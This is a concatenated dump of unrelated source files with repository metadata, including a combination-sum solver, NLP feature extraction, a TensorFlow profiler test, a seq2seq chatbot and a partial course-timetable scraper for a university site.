] | theo.vincent@eleves.enpc.fr |
349c0e8015ac58454cfde9a9351ad0e72ba789e7 | d02508f5ebbbdb4ba939ba830a8e8d9abc69774a | /Array/combinationSum.py | 3162ed77fd98c7e3440de32e89a479d00c864026 | [] | no_license | sameersaini/hackerank | e30c6270aaa0e288fa8b25392819509849cdabad | 3e66f89e02ade703715237722eda2fa2b135bb79 | refs/heads/master | 2021-06-12T09:24:15.266218 | 2019-10-18T02:22:00 | 2019-10-18T02:22:00 | 31,360,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 710 | py | def getCombinations(result, combination, candidates, target, startIndex):
if target == 0:
print(sum(combination))
result.append(combination[::])
return
for i in range(startIndex, len(candidates)):
if candidates[i] > target:
break
combination.append(candidates[i])
getCombinations(result, combination, candidates, target - candidates[i], i)
combination.pop()
class Solution:
def combinationSum(self, candidates, target):
if len(candidates) == 0: return []
candidates.sort()
result = []
combination = []
getCombinations(result, combination, candidates, target, 0)
return result
| [
"sameersaini40@gmail.com"
] | sameersaini40@gmail.com |
e593a1aed501a0ba2ff2741d38bd5ecdde517abc | aa3cc5cddf07721962cdd92611daa0198ecc32ea | /nerds/features/rel2bow.py | c6ff2e0bab60aa292a61dbfca21f0c8c69e8a250 | [] | no_license | druv022/Disease-Normalization-with-Graph-Embeddings | 486a7c59d94ff502145796c1921611b937a4006a | c816ba37815d06bea394a99614e07baa3ebed5f2 | refs/heads/master | 2023-02-26T12:55:18.927522 | 2023-02-14T02:36:15 | 2023-02-14T02:36:15 | 242,658,320 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,181 | py | from pathlib import Path
from scipy.sparse import csc_matrix
from sklearn.externals import joblib
from sklearn.feature_extraction.text import CountVectorizer
from nerds.features.base import RelationFeatureExtractor, UNKNOWN_WORD, UNKNOWN_LABEL, UNKNOWN_POS_TAG, \
UNKNOWN_DEPENDENCY, BOWFeatureExtractor
from nerds.util.file import mkdir
from nerds.util.logging import get_logger
log = get_logger()
KEY = "rel2bow"
class BOWRelationFeatureExtractor(BOWFeatureExtractor, RelationFeatureExtractor):
def __init__(self):
super().__init__()
self.key = KEY
self.word_vectorizer = None
self.label_vectorizer = None
self.pos_vectorizer = None
self.dep_vectorizer = None
def transform(self, X, y=None, relation_labels=None):
log.info("Generating features for {} documents...".format(len(X)))
self.docs_examples = list(self.annotated_documents_to_examples(X, relation_labels=relation_labels))
ent_words = []
ent_labels = []
ent_pos_tags = []
ent_deps = []
rel_labels = []
for doc, examples in self.docs_examples:
for ex in examples:
ent_words += [ex.context["source.text"], ex.context["target.text"]]
ent_labels += [ex.context["source.label"], ex.context["target.label"]]
ent_pos_tags += [ex.context["source.pos"], ex.context["target.pos"]]
ent_deps += [ex.context["dependency"]]
rel_labels += [ex.label]
# add unknown values
ent_words += [UNKNOWN_WORD, UNKNOWN_WORD]
ent_labels += [UNKNOWN_LABEL, UNKNOWN_LABEL]
ent_pos_tags += [UNKNOWN_POS_TAG, UNKNOWN_POS_TAG]
ent_deps += [UNKNOWN_DEPENDENCY]
if not self.word_vectorizer:
# first time run
self.word_vectorizer = CountVectorizer(binary=True)
self.label_vectorizer = CountVectorizer(binary=True)
self.pos_vectorizer = CountVectorizer(binary=True)
self.dep_vectorizer = CountVectorizer(binary=True)
else:
# use vocabularies
self.word_vectorizer = CountVectorizer(binary=True, vocabulary=self.word_vectorizer.vocabulary_)
self.label_vectorizer = CountVectorizer(binary=True, vocabulary=self.label_vectorizer.vocabulary_)
self.pos_vectorizer = CountVectorizer(binary=True, vocabulary=self.pos_vectorizer.vocabulary_)
self.dep_vectorizer = CountVectorizer(binary=True, vocabulary=self.dep_vectorizer.vocabulary_)
ent_words = self._process_unknown_values(
ent_words, self.word_vectorizer.vocabulary, UNKNOWN_WORD)
ent_labels = self._process_unknown_values(
ent_labels, self.label_vectorizer.vocabulary, UNKNOWN_LABEL)
ent_pos_tags = self._process_unknown_values(
ent_pos_tags, self.pos_vectorizer.vocabulary, UNKNOWN_POS_TAG)
ent_deps = self._process_unknown_values(
ent_deps, self.dep_vectorizer.vocabulary, UNKNOWN_DEPENDENCY)
# vectorize
log.info("Vectorizing {} textual entries (words)...".format(len(ent_words)))
word_vectors = self.word_vectorizer.fit_transform(ent_words)
log.info("Vectorizing {} textual entries (labels)...".format(len(ent_labels)))
label_vectors = self.label_vectorizer.fit_transform(ent_labels)
log.info("Vectorizing {} textual entries (POS tags)...".format(len(ent_pos_tags)))
pos_vectors = self.pos_vectorizer.fit_transform(ent_pos_tags)
log.info("Vectorizing {} textual entries (dependency types)...".format(len(ent_deps)))
dep_vectors = self.dep_vectorizer.fit_transform(ent_deps)
# get shapes
n_wor, m_wor = word_vectors.get_shape()
n_lab, m_lab = label_vectors.get_shape()
n_pos, m_pos = pos_vectors.get_shape()
n_dep, m_dep = dep_vectors.get_shape()
# create indices
rows, cols, vals = [], [], []
# ignore the last auxiliary value
for row in range(n_dep - 1):
for col in word_vectors.getrow(2 * row).nonzero()[1]:
rows += [row]
cols += [col]
vals += [1]
for col in word_vectors.getrow(2 * row + 1).nonzero()[1]:
rows += [row]
cols += [col + m_wor]
vals += [1]
for col in label_vectors.getrow(2 * row).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor]
vals += [1]
for col in label_vectors.getrow(2 * row + 1).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + m_lab]
vals += [1]
for col in pos_vectors.getrow(2 * row).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + 2 * m_lab]
vals += [1]
for col in pos_vectors.getrow(2 * row + 1).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + 2 * m_lab + m_pos]
vals += [1]
for col in dep_vectors.getrow(row).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + 2 * m_lab + 2 * m_pos]
vals += [1]
# create a sparse matrix of features
log.info("Creating a feature matrix...")
feature_matrix = csc_matrix((vals, (rows, cols)), shape=(n_dep - 1, 2 * m_wor + 2 * m_lab + 2 * m_pos + m_dep))
return feature_matrix, rel_labels
def _process_unknown_values(self, entries, vocabulary, unknown_label):
entries_ref = []
for entry in entries:
known_tokens = []
for token in entry.split():
if token.lower() in vocabulary:
known_tokens += [token]
else:
known_tokens += [unknown_label]
entries_ref += [" ".join(known_tokens)]
return entries_ref
def save(self, file_path):
save_path = Path(file_path)
mkdir(save_path)
words_path = save_path.joinpath("words.dict")
labels_path = save_path.joinpath("labels.dict")
pos_path = save_path.joinpath("pos.dict")
dep_path = save_path.joinpath("dep.dict")
# save dictionaries
# we don't save examples for now
joblib.dump(self.word_vectorizer, words_path)
joblib.dump(self.label_vectorizer, labels_path)
joblib.dump(self.pos_vectorizer, pos_path)
joblib.dump(self.dep_vectorizer, dep_path)
def load(self, file_path):
load_path = Path(file_path)
words_path = load_path.joinpath("words.dict")
labels_path = load_path.joinpath("labels.dict")
pos_path = load_path.joinpath("pos.dict")
dep_path = load_path.joinpath("dep.dict")
# load dictionaries
# we don't load examples for now
self.word_vectorizer = joblib.load(words_path)
self.label_vectorizer = joblib.load(labels_path)
self.pos_vectorizer = joblib.load(pos_path)
self.dep_vectorizer = joblib.load(dep_path)
return self
| [
"c.thorne.1@elsevier.com"
] | c.thorne.1@elsevier.com |
402ed76f4050dfce87cdf347cee70aa1d417b2b9 | bc233c24523f05708dd1e091dca817f9095e6bb5 | /bitmovin_api_sdk/models/dolby_digital_plus_loudness_control_mode.py | efc53743e4d22e242284b556533a00f56e0a0846 | [
"MIT"
] | permissive | bitmovin/bitmovin-api-sdk-python | e3d6cf8eb8bdad62cb83ec77c0fc4950b06b9cdd | b0860c0b1be7747cf22ad060985504da625255eb | refs/heads/main | 2023-09-01T15:41:03.628720 | 2023-08-30T10:52:13 | 2023-08-30T10:52:13 | 175,209,828 | 13 | 14 | MIT | 2021-04-29T12:30:31 | 2019-03-12T12:47:18 | Python | UTF-8 | Python | false | false | 252 | py | # coding: utf-8
from enum import Enum
from six import string_types, iteritems
from bitmovin_api_sdk.common.poscheck import poscheck_model
class DolbyDigitalPlusLoudnessControlMode(Enum):
PASSTHROUGH = "PASSTHROUGH"
CORRECTION = "CORRECTION"
| [
"openapi@bitmovin.com"
] | openapi@bitmovin.com |
7196ceabaee7d344102504ba28399e85aea0a3c2 | 60e6ea6af12bb37450dc4f254f953d81623232ce | /databases/venv/Scripts/pip3.8-script.py | 1b7b98beb5faf95df7a500294d4b8556ee0eb4ab | [] | no_license | vedant3598/PyCharm-Projects | 72a48d3e8468949c59675330c12aad1c7a03de41 | 7f49533b9c66de33c6a44e4864b1a639e6bfb0be | refs/heads/master | 2020-12-14T15:37:53.838758 | 2020-01-18T20:11:50 | 2020-01-18T20:11:50 | 233,339,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | #!C:\Users\vedan\databases\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
)
| [
"vedant18@hotmail.com"
] | vedant18@hotmail.com |
b4e33b3180ce6ed1a3986904ec6e74ca3c6384fd | 10d98fecb882d4c84595364f715f4e8b8309a66f | /experience_replay/train.py | 74c4899eac50fc4f53a34183dee9333d07cdb04f | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | afcarl/google-research | 51c7b70d176c0d70a5ee31ea1d87590f3d6c6f42 | 320a49f768cea27200044c0d12f394aa6c795feb | refs/heads/master | 2021-12-02T18:36:03.760434 | 2021-09-30T20:59:01 | 2021-09-30T21:07:02 | 156,725,548 | 1 | 0 | Apache-2.0 | 2018-11-08T15:13:53 | 2018-11-08T15:13:52 | null | UTF-8 | Python | false | false | 3,559 | py | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Train an agent.
"""
import os
from absl import app
from absl import flags
from dopamine.discrete_domains import run_experiment
import tensorflow.compat.v1 as tf
from experience_replay import run_experience_replay_experiment
flags.DEFINE_string('base_dir', None,
'Base directory to host all required sub-directories.')
flags.DEFINE_multi_string(
'gin_files', [], 'List of paths to gin configuration files (e.g.'
'"third_party/py/dopamine/agents/dqn/dqn.gin").')
flags.DEFINE_multi_string(
'gin_bindings', [],
'Gin bindings to override the values set in the config files '
'(e.g. "DQNAgent.epsilon_train=0.1",'
' "create_atari_environment.game_name="Pong"").')
flags.DEFINE_string(
'schedule', 'continuous_train_and_eval',
'The schedule with which to run the experiment and choose an appropriate '
'Runner. Supported choices are '
'{continuous_train, eval, continuous_train_and_eval}.')
FLAGS = flags.FLAGS
def create_runner(base_dir, create_agent_fn,
schedule='continuous_train_and_eval'):
"""Creates an experiment Runner.
TODO(b/): Figure out the right idiom to create a Runner. The current mechanism
of using a number of flags will not scale and is not elegant.
Args:
base_dir: Base directory for hosting all subdirectories.
create_agent_fn: A function that takes as args a Tensorflow session and a
Gym Atari 2600 environment, and returns an agent.
schedule: string, which type of Runner to use.
Returns:
runner: A `run_experiment.Runner` like object.
Raises:
ValueError: When an unknown schedule is encountered.
"""
assert base_dir is not None
# Continuously runs training and eval till max num_iterations is hit.
if schedule == 'continuous_train_and_eval':
return run_experience_replay_experiment.ElephantRunner(
base_dir, create_agent_fn)
else:
raise ValueError('Unknown schedule: {}'.format(schedule))
def launch_experiment(create_runner_fn, create_agent_fn):
"""Launches the experiment.
Args:
create_runner_fn: A function that takes as args a base directory and a
function for creating an agent and returns a `Runner` like object.
create_agent_fn: A function that takes as args a Tensorflow session and a
Gym environment, and returns an agent.
"""
run_experiment.load_gin_configs(FLAGS.gin_files, FLAGS.gin_bindings)
runner = create_runner_fn(FLAGS.base_dir, create_agent_fn,
schedule=FLAGS.schedule)
runner.run_experiment()
def main(unused_argv):
"""This main function acts as a wrapper around a gin-configurable experiment.
Args:
unused_argv: Arguments (unused).
"""
tf.logging.set_verbosity(tf.logging.INFO)
launch_experiment(create_runner,
run_experience_replay_experiment.create_agent)
if __name__ == '__main__':
flags.mark_flag_as_required('base_dir')
app.run(main)
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
f58c4b1e9c6366deb20e2f21faa02caffaaed02d | 0d4ed26eb44d54238d86eff91f7b45ab62609161 | /arakat-core/pipeline_generator/preprocessing/graph/ParentChecker.py | 5051302aa3e4fa7275085426d9e23e4b27e0a954 | [
"Apache-2.0"
] | permissive | obalcik/arakat | c8583d8ce4d471df3cf3d9ef4a604307b75c30f5 | 7a8a30708bf8f74de7384c290c035a3a65d3ba47 | refs/heads/master | 2020-03-29T21:36:34.118850 | 2018-11-28T12:18:04 | 2018-11-28T12:18:04 | 150,376,678 | 1 | 0 | Apache-2.0 | 2018-09-26T06:10:08 | 2018-09-26T06:10:08 | null | UTF-8 | Python | false | false | 3,103 | py | from domain.HighLevelNodeTypes import HighLevelNodeTypes
from domain.ErrorTypes import ErrorTypes
from domain.SpecialCases import SpecialCases
def check_parents(cur_nodes, edge_info, nodes):
parent1 = cur_nodes[0]["parent"]
parent2 = cur_nodes[1]["parent"]
# No nodes (except Task nodes) can have a None parent.
if(parent1 is None and parent2 is None):
# Edge between task
return {"parent_type": HighLevelNodeTypes.NO_NODE, "error": ErrorTypes.NO_ERROR}
elif(parent1 is None and parent2 is not None):
# Error: since task node cannot be connected with inner nodes (non-task nodes)
# Error: tasks can't include other tasks as inner nodes
if(nodes[parent2]["node_type"] == HighLevelNodeTypes.TASK_NODE.value):
return {"error": ErrorTypes.TASK_INSIDE_TASK_ERROR}
return {"error": ErrorTypes.TASK_TO_INNER_EDGE_ERROR}
elif(parent1 is not None and parent2 is None):
# Error: since task node cannot be connected with inner nodes (non-task nodes)
# Error: tasks can't include other tasks as inner nodes
if (nodes[parent1]["node_type"] == HighLevelNodeTypes.TASK_NODE.value):
return {"error": ErrorTypes.TASK_INSIDE_TASK_ERROR}
return {"error": ErrorTypes.TASK_TO_INNER_EDGE_ERROR}
else:
# Both node have parents.
# Nodes with an edge must have same parents (No Cross Edges).
# -> No edges between inner nodes of different tasks
# -> No edges between inner nodes and nodes under pipeline nodes/cv nodes
# Determine the parent type: Task Node, Pipeline Node or CV Node...
# Special nodes:
# Only allow crossing edges to pipelines from an inner node iff edge carries model
if(parent1 == parent2):
# Siblings of same parents, satisfies conditions above...
# Meta-parent will be used when the parent is pipeline node or cv node.
return {"parent_id": parent1, "parent_type": HighLevelNodeTypes(nodes[parent1]["node_type"]), "meta_parent_id": nodes[parent1]["parent"], "error": ErrorTypes.NO_ERROR}
else:
return __check_special_cases(cur_nodes, edge_info, [nodes[parent1], nodes[parent2]])
def __check_special_cases(cur_nodes, edge_info, parents):
return __is_model_edge_crossing_into_pipeline(cur_nodes, edge_info, parents)
def __is_model_edge_crossing_into_pipeline(cur_nodes, edge_info, parents):
if(parents[0]["node_type"] == HighLevelNodeTypes.TASK_NODE.value and parents[1]["node_type"] == HighLevelNodeTypes.PIPELINE_NODE.value):
if(edge_info["type"]=="model"):
edge_id=cur_nodes[0]["id"] + "-" + cur_nodes[1]["id"]
return {"special_case": {"name": SpecialCases.CROSSING_MODEL_EDGE_TO_PIPELINE, "task_id": parents[0]["id"], "pipeline_id": parents[1]["id"], "model_source_id": cur_nodes[0]["id"], "model_holder_id": cur_nodes[1]["id"], "edge_info": edge_info}, "error": ErrorTypes.NO_ERROR}
else:
# Might add a better name for the error
return {"error": ErrorTypes.NOT_SIBLING_ERROR} | [
"erelcan89@gmail.com"
] | erelcan89@gmail.com |
a130e7cbc5096fc05d24b77c1bb957b1e492c07d | f466373b13ae038770990331e0193133d0729caf | /movie_chatbot_server_ver/movie/my_chatbot_textcnn2/Rnn_chatbot/chat.py | 95ab9f0f0589abcc0a1e3a49e074b82312c434ed | [] | no_license | kih1024/chatbot | 92f8a321996707a123bcb90ba10bfd318aabea84 | e2f7741d17e1042c74966dfebc5628a4f4020250 | refs/heads/master | 2018-09-06T16:41:46.515759 | 2018-06-04T15:53:47 | 2018-06-04T15:53:47 | 115,597,558 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,653 | py | import tensorflow as tf
import numpy as np
import math
import sys
from Rnn_chatbot.config import FLAGS
from Rnn_chatbot.model import Seq2Seq
from Rnn_chatbot.dialog import Dialog
import xml.etree.ElementTree as ET
import urllib.request
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
url = "http://www.kobis.or.kr/kobisopenapi/webservice/rest/movie/searchMovieList.xml?key="
key = "2a83ee607d889ae32fca2cf9edbbe573"
url = url + key
class ChatBot:
def __init__(self, voc_path, vector_path, train_dir): #!
self.dialog = Dialog() # dialog 객체 생성
self.dialog.load_vocab(voc_path, vector_path) # dataset에서 문장들을 한 줄씩 읽고 단어장을 초기화해준다. #! chat.voc과 word_embedding.voc을 확인.
self.model = Seq2Seq(self.dialog.vocab_size) # 인코딩, 디코딩 RNN 신경망들을 Deep, Wide하게 만들어주고, 모델을 생성시킨다.
# self.model = Seq2Seq(200)
self.sess = tf.Session() # 세션.. Run 시켜줌.
tf.reset_default_graph() # 초기 그래프 리셋
ckpt = tf.train.get_checkpoint_state(train_dir) # 트레이닝 횟수 저장
self.model.saver.restore(self.sess, ckpt.model_checkpoint_path) # Variable값을 불러와서 초기화해준다.
## 모델 만들고 세션을 실행하는데, 그래프 만들고 나서 다시 받아오기 위해 saver에 저장해둔다.
def run(self, sentence): # 챗봇 구동 $$$$$
# sys.stdout.write("> ")
# sys.stdout.flush()
# line = sys.stdin.readline()
line = sentence # $$$$$
while line:
print(self.get_replay(line.strip())) ###
sys.stdout.write("\n> ")
sys.stdout.flush()
line = sys.stdin.readline()
def decode(self, enc_input, dec_input):
if type(dec_input) is np.ndarray:
dec_input = dec_input.tolist() # 리스트로 변환
# print("enc_input in decode : ", enc_input,"dec_input in decode : ",dec_input)
# TODO: 구글처럼 시퀀스 사이즈에 따라 적당한 버킷을 사용하도록 만들어서 사용하도록
if(len(enc_input) % 5 != 0):
input_len = int(((len(enc_input)//5)+1)*5) # input의 길이를 설정 (5단위로 버켓팅해준다.)
else:
input_len = len(enc_input) # 인코딩 input의 길이가 5의 배수라면 길이 그대로 설정
# dec_input_len = int(((len(dec_input) // 5) + 1) * 5) #decoding input의 길이를 설정 (5단위로 버켓팅해준다.)
# print("input_len : ", input_len)
enc_input, dec_input, _ = self.dialog.transform(enc_input, dec_input,
input_len,
FLAGS.max_decode_len) #패딩과 one-hot vector 생성
return self.model.predict(self.sess, [enc_input], [dec_input]) #세션 실행
def get_replay(self, msg): # msg : 내가 입력한 문장
enc_input = self.dialog.tokenizer(msg, False) #문장에서 단어를 나눠준다.
enc_input = self.dialog.tokens_to_ids(enc_input) #토큰화된 단어에 리스트를 입력으로 넣어준다. 단어사전에 없는 단어는 Unknown처리
dec_input = []
# TODO: 구글처럼 Seq2Seq2 모델 안의 RNN 셀을 생성하는 부분에 넣을것
# 입력값에 따라 디코더셀의 상태를 순차적으로 구성하도록 함
# 여기서는 최종 출력값을 사용하여 점진적으로 시퀀스를 만드는 방식을 사용
# 다만 상황에 따라서는 이런 방식이 더 유연할 수도 있을 듯
curr_seq = 0
for i in range(FLAGS.max_decode_len): #20개까지 output을 낼 수 있다.
# print("enc_input : ", enc_input, " , dec_input : ", dec_input)
outputs = self.decode(enc_input, dec_input) #패딩 및 One-hot vector생성 후 세션 실행
# print("outputs : ", outputs)
if self.dialog.is_eos(outputs[0][curr_seq]): #결과값이 나온다면 break (target)
break
elif self.dialog.is_defined(outputs[0][curr_seq]) is not True: #Pre-defined에 정의되어 있지 않다면
dec_input.append(outputs[0][curr_seq]) #인코딩 결과에 대해서 단어 하나를 디코딩 input값으로 넣어준다.
curr_seq += 1
reply = self.dialog.decode([dec_input], True)
# if self.dialog.keyword :
# utf_keyword = str(self.dialog.keyword[0].encode('utf-8'))[2:-1].replace('\\x', '%')
# real_reply = url + "&movieNm=" + utf_keyword
#
# tree = ET.ElementTree(file=urllib.request.urlopen(real_reply))
# root = tree.getroot()
#
# reply += "\n총 " + str(len(root[1])) + "개의 영화가 있습니다.\n"
#
# count = ""
# for i in range(0, len(root[1])):
# if i < len(root[1]) - 1:
# count = count + root[1][i][1].text + "\n"
# else:
# count = count + root[1][i][1].text + "\n"
#
# reply += count
# self.dialog.keyword = []
return reply
def main(_, sentence): # $$$$$
print("깨어나는 중 입니다. 잠시만 기다려주세요...\n")
chatbot = ChatBot(FLAGS.voc_path, FLAGS.vec_path, FLAGS.train_dir) #! chat.voc, word_embedding.voc을 인자로 넣고, model폴더 안의 데이터들을 확인.
chatbot.run(sentence)
if __name__ == "__main__":
#tf.reset_default_graph()
tf.app.run()
| [
"rladlsgh654@naver.com"
] | rladlsgh654@naver.com |
68a8fa89f93202a0a70bcd74a4cb00d6cd3443ce | 6cbaade56c5db347d1be9a3422a69af52df39b97 | /python_workspace/3_bigdata/02_Standardization_Analysis/1_CSV/3pandas_value_meets_condition.py | 7d6e3720622a55a884ddfd88fa1510ccd7e19c49 | [] | no_license | baewonje/iot_bigdata_- | b54e3772f64b9695efee8632183590628b679e11 | 2ce1af67d2f05abeb2ecd442b7299f349bdb9753 | refs/heads/master | 2020-09-06T09:53:53.018320 | 2019-12-06T08:19:33 | 2019-12-06T08:19:33 | 220,390,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 500 | py | # 목적: pandas 문법으로 특정 행을 필터링하기
import pandas as pd
import sys
input_file = sys.argv[1]
output_file = sys.argv[2]
data_frame = pd.read_csv(input_file)
data_frame['Cost'] = data_frame['Cost'].str.strip('$').astype(float)
data_frame_value_meets_condition = data_frame.loc[(data_frame['Supplier Name'].str.contains('Z')) | (data_frame['Cost'] > 600.0), :]
# loc 내부에 ,를 생략하면 에러발생
data_frame_value_meets_condition.to_csv(output_file, index=False ) | [
"50129576+baewonje@users.noreply.github.com"
] | 50129576+baewonje@users.noreply.github.com |
fdaf7031d6c27c7b70b0ded64c5e71e167f1d4ed | 8042163dbac5ddf47f078b4d14f4eb6fe1da030d | /tensorflow/python/profiler/profiler_v2_test.py | 50d29c0532f075d553911327a73af863fb9f1cff | [
"Apache-2.0"
] | permissive | AITutorials/tensorflow | 4513de8db4e9bb74b784f5ba865ef8a573b9efc1 | 6bee0d45f8228f2498f53bd6dec0a691f53b3c7b | refs/heads/master | 2022-07-29T13:37:23.749388 | 2020-06-11T17:47:26 | 2020-06-11T17:57:06 | 271,615,051 | 3 | 0 | Apache-2.0 | 2020-06-11T18:07:11 | 2020-06-11T18:07:10 | null | UTF-8 | Python | false | false | 4,426 | py | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf 2.x profiler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import socket
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
from tensorflow.python.platform import gfile
from tensorflow.python.profiler import profiler_v2 as profiler
from tensorflow.python.profiler import traceme
class ProfilerTest(test_util.TensorFlowTestCase):
def test_profile_exceptions(self):
logdir = self.get_temp_dir()
profiler.start(logdir)
with self.assertRaises(errors.AlreadyExistsError):
profiler.start(logdir)
profiler.stop()
with self.assertRaises(errors.UnavailableError):
profiler.stop()
# Test with a bad logdir, and it correctly raises exception and deletes
# profiler.
# pylint: disable=anomalous-backslash-in-string
profiler.start('/\/\/:123')
# pylint: enable=anomalous-backslash-in-string
with self.assertRaises(Exception):
profiler.stop()
profiler.start(logdir)
profiler.stop()
def test_save_profile(self):
logdir = self.get_temp_dir()
profiler.start(logdir)
with traceme.TraceMe('three_times_five'):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = three * five
self.assertAllEqual(15, product)
profiler.stop()
file_list = gfile.ListDirectory(logdir)
self.assertEqual(len(file_list), 2)
for file_name in gfile.ListDirectory(logdir):
if gfile.IsDirectory(os.path.join(logdir, file_name)):
self.assertEqual(file_name, 'plugins')
else:
self.assertTrue(file_name.endswith('.profile-empty'))
profile_dir = os.path.join(logdir, 'plugins', 'profile')
run = gfile.ListDirectory(profile_dir)[0]
hostname = socket.gethostname()
overview_page = os.path.join(profile_dir, run,
hostname + '.overview_page.pb')
self.assertTrue(gfile.Exists(overview_page))
input_pipeline = os.path.join(profile_dir, run,
hostname + '.input_pipeline.pb')
self.assertTrue(gfile.Exists(input_pipeline))
tensorflow_stats = os.path.join(profile_dir, run,
hostname + '.tensorflow_stats.pb')
self.assertTrue(gfile.Exists(tensorflow_stats))
kernel_stats = os.path.join(profile_dir, run, hostname + '.kernel_stats.pb')
self.assertTrue(gfile.Exists(kernel_stats))
trace_file = os.path.join(profile_dir, run, hostname + '.trace.json.gz')
self.assertTrue(gfile.Exists(trace_file))
def test_profile_with_options(self):
logdir = self.get_temp_dir()
options = profiler.ProfilerOptions(
host_tracer_level=3, python_tracer_level=1)
profiler.start(logdir, options)
with traceme.TraceMe('three_times_five'):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = three * five
self.assertAllEqual(15, product)
profiler.stop()
file_list = gfile.ListDirectory(logdir)
self.assertEqual(len(file_list), 2)
def test_context_manager_with_options(self):
logdir = self.get_temp_dir()
options = profiler.ProfilerOptions(
host_tracer_level=3, python_tracer_level=1)
with profiler.Profile(logdir, options):
with traceme.TraceMe('three_times_five'):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = three * five
self.assertAllEqual(15, product)
file_list = gfile.ListDirectory(logdir)
self.assertEqual(len(file_list), 2)
if __name__ == '__main__':
test.main()
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
0a3ce7bc94322d2939e3bc61f528b8c73ede0326 | 0e79ab62d4e433accb7ba29a7145257c4bbba346 | /model/train_interact_tpu.py | c82ec0281216a640ac8595aa3a44e8002b56184e | [
"MIT"
] | permissive | zeta1999/piglet | 76576fcbd72cba2b7a8e0964b9a984f0cb89d827 | 41fb35a3606415deabb47541e59d9d286c398350 | refs/heads/main | 2023-05-11T04:20:28.684510 | 2021-06-01T00:54:22 | 2021-06-01T00:54:22 | 373,201,430 | 0 | 1 | MIT | 2021-06-02T14:41:05 | 2021-06-02T14:41:04 | null | UTF-8 | Python | false | false | 845 | py | """ Training script! """
import sys
sys.path.append('../')
import tensorflow as tf
from model.neat_config import NeatConfig
from model.interact.modeling import model_fn_builder
from model.interact.dataloader import input_fn_builder
config = NeatConfig.from_args("Train detector script", default_config_file='interact/configs/default_tpu.yaml')
model_fn = model_fn_builder(config)
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=config.device['use_tpu'],
model_fn=model_fn,
config=config.device['tpu_run_config'],
train_batch_size=config.device['train_batch_size'],
eval_batch_size=config.device['val_batch_size'],
predict_batch_size=config.device['val_batch_size'],
# params={},
)
estimator.train(input_fn=input_fn_builder(config, is_training=True),
max_steps=config.optimizer['num_train_steps']) | [
"rowanz@cs.washington.edu"
] | rowanz@cs.washington.edu |
304e838e3c7304f8a3cada5e5202249be9c5c479 | a8d68074db5c2b2697650ed0281979d3e00cf5a8 | /Nyspider/duapp2.drexel.edu/TMS.py | 5938794401c1348b9eb96c9578809eba807074c7 | [] | no_license | 15807857476/bogdata-2 | 9595609ea2ae5ae0a48c511f911df2498456467e | 1934cdfa234b77ca91e349b84688db113ff39e8c | refs/heads/master | 2023-05-26T19:10:18.439269 | 2019-05-24T02:50:41 | 2019-05-24T02:50:41 | 188,327,526 | 3 | 1 | null | 2023-05-22T21:37:27 | 2019-05-24T00:53:28 | Python | UTF-8 | Python | false | false | 6,277 | py | #coding:utf-8
import requests
from bs4 import BeautifulSoup
import threading
import re
import os
import xlwt3
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'}
def Get_Quarter():
statue=True
while statue:
try:
html=requests.get('https://duapp2.drexel.edu/webtms_du/app?page=Home&service=page',headers=headers,timeout=30).text
statue=False
except:
continue
table=BeautifulSoup(html,'lxml').find_all('table',attrs={'class':'termPanel'})
quarter={}
for item in table[0].find_all('a'):
quarter[item.get_text()]='https://duapp2.drexel.edu'+item.get('href')
for item in table[1].find_all('a'):
quarter[item.get_text()]='https://duapp2.drexel.edu'+item.get('href')
return quarter
def Get_College(url):
statue=True
while statue:
try:
html=requests.get(url,headers=headers,timeout=30).text
statue=False
except:
continue
table=BeautifulSoup(html,'lxml').find('div',id='sideLeft').find_all('a')
colleges={}
for item in table:
colleges[item.get_text()]='https://duapp2.drexel.edu'+item.get('href')
return colleges
def Get_subjects(url):
statue=True
while statue:
try:
html=requests.get(url,headers=headers,timeout=30).text
statue=False
except:
continue
